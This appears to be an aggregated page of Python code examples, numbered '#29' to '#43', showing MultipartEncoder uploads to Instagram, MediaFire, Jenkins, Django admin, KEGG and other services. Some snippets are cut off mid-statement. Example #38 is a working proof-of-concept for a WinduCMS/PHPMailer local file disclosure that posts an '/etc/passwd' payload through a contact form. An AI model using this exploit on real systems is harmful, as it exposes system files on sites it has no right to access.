                        text_file.close()
                    else:
                        print(row['Mail'], "DENTRO")
            except:
                print("_______è andato tutto a puttane_________")
Пример #29
0
def upload_video(self, video, thumbnail, caption=None, upload_id=None):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    data = {
        'upload_id': upload_id,
        '_csrftoken': self.token,
        'media_type': '2',
        '_uuid': self.uuid,
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({'X-IG-Capabilities': '3Q4=',
                                 'X-IG-Connection-Type': 'WIFI',
                                 'Host': 'i.instagram.com',
                                 'Cookie2': '$Version=1',
                                 'Accept-Language': 'en-US',
                                 'Accept-Encoding': 'gzip, deflate',
                                 'Content-type': m.content_type,
                                 'Connection': 'keep-alive',
                                 'User-Agent': self.user_agent})
    response = self.session.post(config.API_URL + "upload/video/", data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body['video_upload_urls'][3]['url']
        upload_job = body['video_upload_urls'][3]['job']

        with open(video, 'rb') as video_bytes:
            video_data = video_bytes.read()
        # solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method
        request_size = len(video_data) // 4
        last_request_extra = len(video_data) - 3 * request_size

        headers = copy.deepcopy(self.session.headers)
        self.session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': 'application/octet-stream',
            'Session-ID': upload_id,
            'Connection': 'keep-alive',
            'Content-Disposition': 'attachment; filename="video.mov"',
            'job': upload_job,
            'Host': 'upload.instagram.com',
            'User-Agent': self.user_agent
        })
        for i in range(4):
            start = i * request_size
            if i == 3:
                end = i * request_size + last_request_extra
            else:
                end = (i + 1) * request_size
            length = last_request_extra if i == 3 else request_size
            content_range = "bytes {start}-{end}/{len_video}".format(
                start=start, end=end - 1, len_video=len(video_data)).encode('utf-8')

            self.session.headers.update({'Content-Length': str(end - start), 'Content-Range': content_range})
            response = self.session.post(upload_url, data=video_data[start:start + length])
        self.session.headers = headers

        if response.status_code == 200:
            if self.configure_video(upload_id, video, thumbnail, caption):
                self.expose()
                return True
    return False
Пример #30
0
def upload_study_me(file_path, model_type, host, port, output_folder, attachments):
    file_dict = []
    headers = {'Content-Type': 'multipart/related; '}
    
    images = load_image_data(file_path)
    images = sort_images(images)

    if model_type == BOUNDING_BOX:
        print("Performing bounding box prediction")
        inference_command = 'get-bounding-box-2d'
    elif model_type == SEGMENTATION_MODEL:
        if images[0].position is None:
            # No spatial information available. Perform 2D segmentation
            print("Performing 2D mask segmentation")
            inference_command = 'get-probability-mask-2D'
        else:
            print("Performing 3D mask segmentation")
            inference_command = 'get-probability-mask-3D'
    else:
        inference_command = 'other'
        
    request_json = {'request': 'post', 
                    'route': '/',
                    'inference_command': inference_command}

    count = 0
    for att in attachments:
        count += 1
        field = str(count)
        fo = open(att, 'rb').read()
        filename = os.path.basename(os.path.normpath(att))
        file_dict.append((field, (filename, fo, 'application/octet-stream')))

    for image in images:
        try:
            dcm_file = pydicom.dcmread(image.path)
            count += 1
            field = str(count)
            fo = open(image.path, 'rb').read()
            filename = os.path.basename(os.path.normpath(image.path))
            file_dict.append((field, (filename, fo, 'application/dicom')))
        except:
            print('File {} is not a DICOM file'.format(image.path))
            continue
    
    print('Sending {} files...'.format(len(images)))

    file_dict.insert(0, ('request_json', ('request', json.dumps(request_json).encode('utf-8'), 'text/json')))
    
    me = MultipartEncoder(fields=file_dict)
    boundary = me.content_type.split('boundary=')[1]
    headers['Content-Type'] = headers['Content-Type'] + 'boundary="{}"'.format(boundary)

    r = requests.post('http://' + host + ':' + port + '/', data=me, headers=headers)
    
    if r.status_code != 200:
        print("Got error status code ", r.status_code)
        exit(1)

    multipart_data = decoder.MultipartDecoder.from_response(r)

    json_response = json.loads(multipart_data.parts[0].text)
    print("JSON response:", json_response)

    if model_type == SEGMENTATION_MODEL:
        mask_count = len(json_response["parts"])

        # Assert that we get one binary part for each object in 'parts'
        # The additional two multipart object are: JSON response and request:response digests
        assert mask_count == len(multipart_data.parts) - 2, \
            "The server must return one binary buffer for each object in `parts`. Got {} buffers and {} 'parts' objects" \
            .format(len(multipart_data.parts) - 2, mask_count)
        
        masks = [np.frombuffer(p.content, dtype=np.uint8) for p in multipart_data.parts[1:mask_count+1]]

        if images[0].position is None:
            # We must sort the images by their instance UID based on the order of the response:
            identifiers = [part['dicom_image']['SOPInstanceUID'] for part in json_response["parts"]]
            filtered_images = []
            for id in identifiers:
                image = next((img for img in images if img.instanceUID == id))
                filtered_images.append(image)
            test_inference_mask.generate_images_for_single_image_masks(filtered_images, masks, json_response, output_folder)
        else:
            test_inference_mask.generate_images_with_masks(images, masks, json_response, output_folder)

        print("Segmentation mask images generated in folder: {}".format(output_folder))
        print("Saving output masks to files '{}/output_masks_*.npy".format(output_folder))
        for index, mask in enumerate(masks):
            mask.tofile('{}/output_masks_{}.npy'.format(output_folder, index + 1))
    elif model_type == BOUNDING_BOX:
        boxes = json_response['bounding_boxes_2d']
        test_inference_boxes.generate_images_with_boxes(images, boxes, output_folder)

    with open(os.path.join(output_folder, 'response.json'), 'w') as outfile:
        json.dump(json_response, outfile)
Пример #31
0
    def make_post_request(self, url, payload=None, params=None, files_attached=False):
        """
        Make a POST request using the provided ``url`` and ``payload``.
        The ``payload`` must be a dict that contains the request values.
        The payload dict may contain file handles (in which case the files_attached
        flag must be set to true).

        If the ``params`` are not provided, use ``default_params`` class field.
        If params are provided and the provided dict does not have ``key`` key,
        the default ``self.key`` value will be included in what's passed to
        the server via the request.

        :return: The decoded response.
        """

        def my_dumps(d):
            """
            Apply ``json.dumps()`` to the values of the dict ``d`` if they are
            not of type ``FileStream``.
            """
            for k, v in d.items():
                if not isinstance(v, (FileStream, str, bytes)):
                    d[k] = json.dumps(v)
            return d

        # Compute data, headers, params arguments for request.post,
        # leveraging the requests-toolbelt library if any files have
        # been attached.
        if files_attached:
            if params:
                payload.update(params)
            payload = my_dumps(payload)
            payload = MultipartEncoder(fields=payload)
            headers = self.json_headers.copy()
            headers['Content-Type'] = payload.content_type
            post_params = None
        else:
            if payload is not None:
                payload = json.dumps(payload)
            headers = self.json_headers
            post_params = params

        r = requests.post(
            url,
            params=post_params,
            data=payload,
            headers=headers,
            timeout=self.timeout,
            allow_redirects=False,
            verify=self.verify,
        )
        if r.status_code == 200:
            try:
                return r.json()
            except Exception as e:
                raise ConnectionError(
                    f"Request was successful, but cannot decode the response content: {e}",
                    body=r.content,
                    status_code=r.status_code,
                )
        # @see self.body for HTTP response body
        raise ConnectionError(
            f"Unexpected HTTP status code: {r.status_code}",
            body=r.text,
            status_code=r.status_code,
        )
Пример #32
0
    def request(self, action, params=None, action_token_type=None,
                upload_info=None, headers=None):
        """Perform request to MediaFire API

        action -- "category/name" of method to call
        params -- dict of parameters or query string
        action_token_type -- action token to use: None, "upload", "image"
        upload_info -- in case of upload, dict of "fd" and "filename"
        headers -- additional headers to send (used for upload)

        session_token and signature generation/update is handled automatically
        """

        uri = self._build_uri(action)

        if isinstance(params, six.text_type):
            query = params
        else:
            query = self._build_query(uri, params, action_token_type)

        if headers is None:
            headers = {}

        if upload_info is None:
            # Use request body for query
            data = query
            headers['Content-Type'] = FORM_MIMETYPE
        else:
            # Use query string for query since payload is file
            uri += '?' + query

            if "filename" in upload_info:
                data = MultipartEncoder(
                    fields={'file': (
                        upload_info["filename"],
                        upload_info["fd"],
                        UPLOAD_MIMETYPE
                    )}
                )
                headers["Content-Type"] = data.content_type
            else:
                data = upload_info["fd"]
                headers["Content-Type"] = UPLOAD_MIMETYPE

        logger.debug("uri=%s query=%s",
                     uri, query if not upload_info else None)

        try:
            # bytes from now on
            url = (API_BASE + uri).encode('utf-8')
            if isinstance(data, six.text_type):
                # request's data is bytes, dict, or filehandle
                data = data.encode('utf-8')

            response = self.http.post(url, data=data,
                                      headers=headers, stream=True)
        except RequestException as ex:
            logger.exception("HTTP request failed")
            raise MediaFireConnectionError(
                "RequestException: {}".format(ex))

        return self._process_response(response)
Пример #33
0
    def publish(self, doc_artifact):
        """
        Pass the doc artifact to a Jenkins job. The actions performed by
        the Jenkins job is up to the user to decide. Suggested use of the
        Jenkins upload option is to pass the artifact to Jenkins, upload it
        to a server and unpack the files so they can be served from a webpage.

        Requires the following sections in cirrus.conf:

        [doc]
        publisher = jenkins

        [jenkins]
        url = http://localhost:8080
        doc_job = default
        doc_var = archive
        arc_var = ARCNAME
        extra_vars = True

        [jenkins_docs_extra_vars]
        var1 = value
        var2 = value

        .. note:: The doc_var is the location of the archive in the Jenkins
            workspace. It must match whatever is in the section "File location"
            in the Jenkins job configuration.

        .. note:: arc_var is the variable that will be used to name the file/folder
            the archive should be unpacked to as determined by the name of the
            archive filename. I.e. package-0.0.0.tar.gz => package-0.0.0

        .. note:: extra_vars is a boolean. When True a section named
            [jenkins_docs_extra_vars] should be added to cirrus.conf containing
            any other variables necessary for the Jenkins build.
        """
        try:
            jenkins_config = self.package_conf['jenkins']
        except KeyError:
            msg = ('[jenkins] section missing from cirrus.conf. '
                   'Please see below for an example.\n'
                   '\n [jenkins]'
                   '\n url = http://localhost:8080'
                   '\n doc_job = default'
                   '\n doc_var = archive'
                   '\n arc_var = ARCNAME'
                   '\n extra_vars = True'
                   '\n '
                   '\n [jenkins_docs_extra_vars]'
                   '\n varname = value'
                   '\n varname1 = value1')
            raise RuntimeError(msg)

        filename = os.path.basename(doc_artifact)
        build_params = {
            "parameter": [{
                "name": jenkins_config['doc_var'],
                "file": "file0"
            }]
        }

        if jenkins_config.get('arc_var') is not None:
            arcname = filename.rsplit('.', 2)[0]
            build_params['parameter'].append({
                "name": jenkins_config['arc_var'],
                "value": arcname
            })

        # need to check for True as a string because ConfigParser always
        # stores values internally as strings
        if jenkins_config.get('extra_vars', 'False').lower() == 'true':
            extra_vars = self.package_conf.get('jenkins_docs_extra_vars', {})
            for k, v in extra_vars.iteritems():
                build_params['parameter'].append({"name": k, "value": v})

        payload = MultipartEncoder(
            fields={
                "file0": (filename, open(doc_artifact, 'rb'),
                          'application/x-gzip'),
                "json": json.dumps(build_params)
            })

        client = JenkinsClient(jenkins_config['url'])

        response = client.start_job_file_upload(jenkins_config['doc_job'],
                                                payload)

        if response.status_code != 201:
            LOGGER.error(response.text)
            raise RuntimeError('Jenkins HTTP API returned code {}'.format(
                response.status_code))
Пример #34
0
#login_xadmin(s)
# 前面先登录

url2 = "http://49.235.92.12:8020/xadmin/hello/teacherman/add/"
r3 = s.get(url2)
# print(r3.text)

token2 = re.findall("name='csrfmiddlewaretoken' value='(.+?)'", r3.text)
print(token2[0])
# multipart/form-data  类型post请求

m = MultipartEncoder(fields=[
    ("csrfmiddlewaretoken", token2[0]),
    ("csrfmiddlewaretoken", token2[0]),
    ("teacher_name", "xx44"),
    ("tel", "xx12"),
    ("mail", "xx"),
    ("sex", "M"),
    ("_save", "xx"),
], )
r4 = s.post(url2, data=m, headers={'Content-Type': m.content_type})
print(r4.text)

from requests_toolbelt import MultipartEncoder
m = MultipartEncoder(
    fields={
        'field0': 'value',
        'field1': 'value',
        'field2': ('filename', open('file.py', 'rb'), 'text/plain')
    })
r = requests.post('http://httpbin.org/post',
Пример #35
0
    def upload_video(self, video, thumbnail, caption=None, upload_id=None):

        # TODO: Migrate to use _sendrequest.
        if upload_id is None:
            upload_id = str(int(time.time() * 1000))
        data = {
            'upload_id': upload_id,
            '_csrftoken': self._csrftoken,
            'media_type': '2',
            '_uuid': self._uuid,
        }
        m = MultipartEncoder(data, boundary=self._uuid)
        self._session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Host': 'i.instagram.com',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': m.content_type,
            'Connection': 'keep-alive',
            'User-Agent': self.USER_AGENT
        })
        response = self._session.post(self.API_URL + "upload/video/",
                                      data=m.to_string())
        if response.status_code == 200:
            body = json.loads(response.text)
            upload_url = body['video_upload_urls'][3]['url']
            upload_job = body['video_upload_urls'][3]['job']

            with open(video, 'rb') as videofile:
                video_data = videofile.read()
            request_size = int(math.floor(len(video_data) / 4))
            last_request_extra = (len(video_data) - (request_size * 3))

            headers = copy.deepcopy(self._session.headers)
            self._session.headers.update({
                'X-IG-Capabilities': '3Q4=',
                'X-IG-Connection-Type': 'WIFI',
                'Cookie2': '$Version=1',
                'Accept-Language': 'en-US',
                'Accept-Encoding': 'gzip, deflate',
                'Content-type': 'application/octet-stream',
                'Session-ID': upload_id,
                'Connection': 'keep-alive',
                'Content-Disposition': 'attachment; filename="video.mov"',
                'job': upload_job,
                'Host': 'upload.instagram.com',
                'User-Agent': self.USER_AGENT
            })
            for i in range(0, 4):
                start = i * request_size
                if i == 3:
                    end = i * request_size + last_request_extra
                else:
                    end = (i + 1) * request_size
                length = last_request_extra if i == 3 else request_size
                content_range = "bytes {start}-{end}/{lenVideo}".format(
                    start=start, end=(end - 1),
                    lenVideo=len(video_data)).encode('utf-8')

                self._session.headers.update({
                    'Content-Length': str(end - start),
                    'Content-Range': content_range,
                })
                LOGGER.info("Starting to upload %d bytes of video data",
                            len(video_data))
                response = self._session.post(upload_url,
                                              data=video_data[start:start +
                                                              length])
            self._session.headers = headers

            if response.status_code == 200:
                if self.configure_video(upload_id, video, thumbnail, caption):
                    LOGGER.info("Video configuration complete. Exposing.")
                    self.expose()
                    LOGGER.info("Video upload complete.")

        return False
def postFileFunction(url, datafile, runmeta):

    f = copy.copy(runmeta)

    formsubmit = MultipartEncoder({
        'tabletest_bundle_api_upload_type[Filetable][filename]':
        f.FileName,
        'tabletest_bundle_api_upload_type[Filetable][toolid][toolname]':
        f.Toolname,
        'tabletest_bundle_api_upload_type[Filetable][seqrun]':
        '1',
        'tabletest_bundle_api_upload_type[Filetable][smpid]':
        f.BiocontrolSampId,
        'tabletest_bundle_api_upload_type[Filetable][runid]':
        f.BRunId,
        'tabletest_bundle_api_upload_type[Filetable][day]':
        str((f.SampledOn - f.InnoculatedFrom).days),
        'tabletest_bundle_api_upload_type[Filetable][gnmid][gnmname]':
        f.Genomename,
        'tabletest_bundle_api_upload_type[Filetable][glocoverage]':
        f.GloCoverage,
        'tabletest_bundle_api_upload_type[Filetable][expid]':
        f.Experiment  #Can be removed  from here.
        ,
        'tabletest_bundle_api_upload_type[RunMeta][runid]':
        f.RunId,
        'tabletest_bundle_api_upload_type[RunMeta][rundescription]':
        f.RunDescription,
        'tabletest_bundle_api_upload_type[RunMeta][runfrom][year]':
        str(f.SampledOn.year),
        'tabletest_bundle_api_upload_type[RunMeta][innoculatedfrom][month]':
        str(f.InnoculatedFrom.month),
        'tabletest_bundle_api_upload_type[RunMeta][innoculatedfrom][day]':
        str(f.InnoculatedFrom.day),
        'tabletest_bundle_api_upload_type[RunMeta][innoculatedfrom][year]':
        str(f.InnoculatedFrom.year),
        'tabletest_bundle_api_upload_type[RunMeta][runfrom][month]':
        str(f.SampledOn.month),
        'tabletest_bundle_api_upload_type[RunMeta][runfrom][day]':
        str(f.SampledOn.day),
        'tabletest_bundle_api_upload_type[RunMeta][cust]':
        f.Customer,
        'tabletest_bundle_api_upload_type[RunMeta][corpobj]':
        f.CorpObj,
        'tabletest_bundle_api_upload_type[RunMeta][createdby]':
        f.CreatedBy,
        'tabletest_bundle_api_upload_type[RunMeta][labbook]':
        f.Labbook,
        'tabletest_bundle_api_upload_type[RunMeta][task]':
        f.Task,
        'tabletest_bundle_api_upload_type[RunMeta][milestone]':
        f.Milestone,
        'tabletest_bundle_api_upload_type[RunMeta][experiment]':
        f.Experiment,
        'tabletest_bundle_api_upload_type[Filetable][uploadFile]':
        ('filename', open(datafile + '/Hansel.csv', 'r'), 'text/csv')
    })

    # exit()
    r = requests.post(url,
                      data=formsubmit,
                      headers={'Content-Type': formsubmit.content_type})
    # print(r.status_code)
    # print r.json()[u'data']
    if r.status_code == 200 and r.json()['data'] != 'Null':
        return str(r.json()['data'])
    else:
        return 'Null'
Пример #37
0
def upload_video(self, video, thumbnail, caption=None, upload_id=None):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    data = {
        'upload_id': upload_id,
        '_csrftoken': self.token,
        'media_type': '2',
        '_uuid': self.uuid,
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Host': 'i.instagram.com',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': m.content_type,
        'Connection': 'keep-alive',
        'User-Agent': config.USER_AGENT
    })
    response = self.session.post(config.API_URL + "upload/video/",
                                 data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body['video_upload_urls'][3]['url']
        upload_job = body['video_upload_urls'][3]['job']

        with open(video, 'rb') as video_bytes:
            video_data = video_bytes.read()
        # solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method
        request_size = len(video_data) // 4
        last_request_extra = len(video_data) - 3 * request_size

        headers = copy.deepcopy(self.session.headers)
        self.session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': 'application/octet-stream',
            'Session-ID': upload_id,
            'Connection': 'keep-alive',
            'Content-Disposition': 'attachment; filename="video.mov"',
            'job': upload_job,
            'Host': 'upload.instagram.com',
            'User-Agent': config.USER_AGENT
        })
        for i in range(4):
            start = i * request_size
            if i == 3:
                end = i * request_size + last_request_extra
            else:
                end = (i + 1) * request_size
            length = last_request_extra if i == 3 else request_size
            content_range = "bytes {start}-{end}/{len_video}".format(
                start=start, end=end - 1,
                len_video=len(video_data)).encode('utf-8')

            self.session.headers.update({
                'Content-Length': str(end - start),
                'Content-Range': content_range
            })
            response = self.session.post(upload_url,
                                         data=video_data[start:start + length])
        self.session.headers = headers

        if response.status_code == 200:
            if self.configure_video(upload_id, video, thumbnail, caption):
                self.expose()
                return True
    return False
Пример #38
0
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#   
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
# 
# // PoC //
#
# It requires a contact form present on the website
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#

from requests_toolbelt import MultipartEncoder
import requests

print("WinduCMS <= 3.1 Exploit")
 
url = 'http://localhost/contact_page?mn=contactform.message.negative'
email = '*****@*****.**'
payload = '<img src="/etc/passwd"'
form_input = 'name'
fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload}
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315')
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 'Content-Type': m.content_type}
print('Sending payload to target...')
r = requests.post(url, data=m.to_string(), headers=headers)
if r.status_code == 200:
	print('Exploited.')
Пример #39
0
def upload_video(self,
                 video,
                 caption=None,
                 upload_id=None,
                 thumbnail=None,
                 options={}):
    """Upload video to Instagram

    @param video      Path to video file (String)
    @param caption    Media description (String)
    @param upload_id  Unique upload_id (String). When None, then generate
                      automatically
    @param thumbnail  Path to thumbnail for video (String). When None, then
                      thumbnail is generate automatically
    @param options    Object with difference options, e.g. configure_timeout,
                      rename_thumbnail, rename (Dict)
                      Designed to reduce the number of function arguments!
                      This is the simplest request object.

    @return           Object with state of uploading to Instagram (or False)
    """
    options = dict(
        {
            "configure_timeout": 15,
            "rename_thumbnail": True,
            "rename": True
        }, **(options or {}))
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    video, thumbnail, width, height, duration = resize_video(video, thumbnail)
    data = {
        "upload_id": upload_id,
        "_csrftoken": self.token,
        "media_type": "2",
        "_uuid": self.uuid,
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({
        "X-IG-Capabilities": "3Q4=",
        "X-IG-Connection-Type": "WIFI",
        "Host": "i.instagram.com",
        "Cookie2": "$Version=1",
        "Accept-Language": "en-US",
        "Accept-Encoding": "gzip, deflate",
        "Content-type": m.content_type,
        "Connection": "keep-alive",
        "User-Agent": self.user_agent,
    })
    response = self.session.post(config.API_URL + "upload/video/",
                                 data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body["video_upload_urls"][3]["url"]
        upload_job = body["video_upload_urls"][3]["job"]

        with open(video, "rb") as video_bytes:
            video_data = video_bytes.read()
        # solve issue #85 TypeError:
        # slice indices must be integers or None or have an __index__ method
        request_size = len(video_data) // 4
        last_request_extra = len(video_data) - 3 * request_size

        headers = copy.deepcopy(self.session.headers)
        self.session.headers.update({
            "X-IG-Capabilities": "3Q4=",
            "X-IG-Connection-Type": "WIFI",
            "Cookie2": "$Version=1",
            "Accept-Language": "en-US",
            "Accept-Encoding": "gzip, deflate",
            "Content-type": "application/octet-stream",
            "Session-ID": upload_id,
            "Connection": "keep-alive",
            "Content-Disposition": 'attachment; filename="video.mov"',
            "job": upload_job,
            "Host": "upload.instagram.com",
            "User-Agent": self.user_agent,
        })
        for i in range(4):
            start = i * request_size
            if i == 3:
                end = i * request_size + last_request_extra
            else:
                end = (i + 1) * request_size
            length = last_request_extra if i == 3 else request_size
            content_range = "bytes {start}-{end}/{len_video}".format(
                start=start, end=end - 1,
                len_video=len(video_data)).encode("utf-8")

            self.session.headers.update({
                "Content-Length": str(end - start),
                "Content-Range": content_range
            })
            response = self.session.post(upload_url,
                                         data=video_data[start:start + length])
        self.session.headers = headers

        configure_timeout = options.get("configure_timeout")
        if response.status_code == 200:
            for attempt in range(4):
                if configure_timeout:
                    time.sleep(configure_timeout)
                if self.configure_video(
                        upload_id,
                        video,
                        thumbnail,
                        width,
                        height,
                        duration,
                        caption,
                        options=options,
                ):
                    media = self.last_json.get("media")
                    self.expose()
                    if options.get("rename"):
                        from os import rename

                        rename(video, "{}.REMOVE_ME".format(video))
                    return media
    return False
Пример #40
0
                    node_colors[kegg_id] = cmap(color(dsi.data[0, n]))

            elif 'NCBI-GENE' in m.databases:
                kegg_id = m.databases['NCBI-GENE']
                if kegg_id is not None:
                    node_colors[kegg_id] = cmap(color(dsi.data[0, n]))

with open(os.path.join(_pathomx_tempdir, 'kegg-pathway-data.txt'), 'w') as tmp:
    tmp.write('#hsa\tData\n')
    for k, c in list(node_colors.items()):
        tmp.write('%s\t%s\n' % (k, c[0]))

m = MultipartEncoder(
        fields={
          'map': config['kegg_pathway_id'],
          'mapping_list': ('filename', open(os.path.join(_pathomx_tempdir, 'kegg-pathway-data.txt'), 'r')),
          'mode': 'color',
          'submit': 'Exec',
         }
)

r = requests.post(url, data=m, headers={'Content-Type': m.content_type})
html = r.text

from pathomx.displayobjects import Html  # We've got the html page; pull out the image
# <img src="/tmp/mark_pathway13818418802193/hsa05200.1.png" name="pathwayimage" usemap="#mapdata" border="0" />
m = re.search('\<img src="(.*)" name="pathwayimage"', html)
img = m.group(1)

m = re.search('^KEGG PATHWAY: (.*)$', html, flags=re.MULTILINE)
title = m.group(1)
output_html = '<html><body><img src="http://www.kegg.jp%s"></body></html>' % img
Пример #41
0
 session = requests.Session()
 try:
     setup(session)
     url = 'http://localhost:8080/api/darkshield/files/fileSearchContext.mask'
     context = json.dumps({
         "fileSearchContextName": file_search_context_name,
         "fileMaskContextName": file_mask_context_name
     })
     process_files = [('test.json', 'application/json', 'json-masked'),
                      ('test.xml', 'application/xml', 'xml-masked')]
     for file_name, media_type, masked_folder in process_files:
         with open(file_name, 'rb') as f:
             os.makedirs(masked_folder, exist_ok=True)
             encoder = MultipartEncoder(
                 fields={
                     'context': ('context', context, 'application/json'),
                     'file': (file_name, f, media_type)
                 })
             logging.info(f"POST: sending '{file_name}' to {url}")
             with session.post(
                     url,
                     data=encoder,
                     stream=True,
                     headers={'Content-Type': encoder.content_type}) as r:
                 if r.status_code >= 300:
                     raise Exception(
                         f"Failed with status {r.status_code}:\n\n{r.json()}"
                     )
                 logging.info(
                     f"Extracting '{file_name}' and 'results.json' into {masked_folder}."
                 )
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument('--target',
                        default="http://127.0.0.1:8000/uploadfile/",
                        help="upload FILE to this url")
    parser.add_argument('--http2',
                        action='store_true',
                        help="use http2 for connection")
    parser.add_argument('--file', help="upload this file", required=True)

    args = parser.parse_args()
    s = requests.Session()
    if args.http2:
        print("Using http2")
        s.mount('https://', HTTP20Adapter())
    else:
        print("Using http1")

    with open(args.file, 'rb') as f:
        # MultipartEncoder allows us to do a streaming upload of a large file
        m = MultipartEncoder(fields={'file': ('filename', f, 'text/plain')})

        start = datetime.datetime.now()
        print(f"Started at {start}")
        s.put(args.target, data=m, headers={'Content-Type': m.content_type})
        end = datetime.datetime.now()
        print(f"Ended at { end }")
        duration = end - start
        print(f"Upload took: {duration}")
Пример #43
0
# def add_file_image():
#     '''添加文件和图片'''

s = requests.session()
login_xadmin(s)
url3 = "http://49.235.92.12:8020/xadmin/hello/fileimage/add/"
r = s.get(url3)

csrfmiddlewaretoken = re.findall(r"value='(.+?)'", r.text)
print(csrfmiddlewaretoken)
body1 = MultipartEncoder(
    fields=[(
        "csrfmiddlewaretoken",
        csrfmiddlewaretoken[0]), ("csrfmiddlewaretoken",
                                  csrfmiddlewaretoken[0]), ("title", "测试小脚本1"),
            ("image", ("5666.png",
                       open(r'C:\Users\Administrator\Desktop\5666.png', "rb"),
                       "image/png")),
            ("fiels", ("ce12.txt",
                       open(r'C:\Users\Administrator\Desktop\ce12.txt', "rb"),
                       "text/plain")), ("_save", "")])
print("345453443453435435434343")
r3 = s.post(url=url3, data=body1, headers={"content-Type": body1.content_type})
print(r3.text)

demo = etree.HTML(r3.text)
result_demo = demo.xpath(
    '//*[@id="changelist-form"]/div[1]/table/tbody/tr[1]/td[2]/a')
print(result_demo[0])
result_get = result_demo[0].text
print(result_get)